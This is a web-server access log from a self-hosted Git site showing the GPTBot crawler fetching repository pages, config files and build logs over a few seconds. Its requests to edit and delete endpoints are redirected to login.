git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 74.7.227.38] [Length 12328] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook" -[17/Feb/2026:16:08:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/.Notebook" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook" -[17/Feb/2026:16:08:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/.Notebook" -[17/Feb/2026:16:08:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/.Notebook" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook" -[17/Feb/2026:16:08:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/.Notebook" -[17/Feb/2026:16:08:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:08:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&state=all&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:16:08:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/.Notebook" [Client 74.7.227.38] [Length 9788] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook" -[17/Feb/2026:16:08:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11568] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/.vscode" -[17/Feb/2026:16:08:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11569] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/.vscode" -[17/Feb/2026:16:08:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11568] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/.vscode" -[17/Feb/2026:16:08:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11568] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/.vscode" -[17/Feb/2026:16:08:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 329] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:08:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" -[17/Feb/2026:16:08:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" -[17/Feb/2026:16:08:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" -[17/Feb/2026:16:08:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" -[17/Feb/2026:16:08:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 74.7.227.38] [Length 13018] [Gzip 6.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" -[17/Feb/2026:16:08:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 74.7.227.38] [Length 1001] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" -[17/Feb/2026:16:08:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&state=all&type=all" [Client 74.7.227.38] [Length 9944] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:16:08:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 74.7.227.38] [Length 1658] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" -[17/Feb/2026:16:08:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:08:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:08:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9937] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:08:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:08:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 74.7.227.38] [Length 10036] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" -[17/Feb/2026:16:08:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&state=all&type=all" [Client 74.7.227.38] [Length 9967] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:16:08:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 329] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:08:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" -[17/Feb/2026:16:08:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" -[17/Feb/2026:16:08:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" -[17/Feb/2026:16:09:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" -[17/Feb/2026:16:09:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9964] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&state=all&type=all" -[17/Feb/2026:16:09:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10707] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:09:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10708] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:09:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 329] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:09:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 329] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:09:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10707] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:09:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11532] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/.vscode" -[17/Feb/2026:16:09:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10708] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:09:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 329] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10709] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11272] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" -[17/Feb/2026:16:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21061] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21063] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11272] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11315] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:16:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9905] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:16:09:09 +0000] - 200 200 - GET https 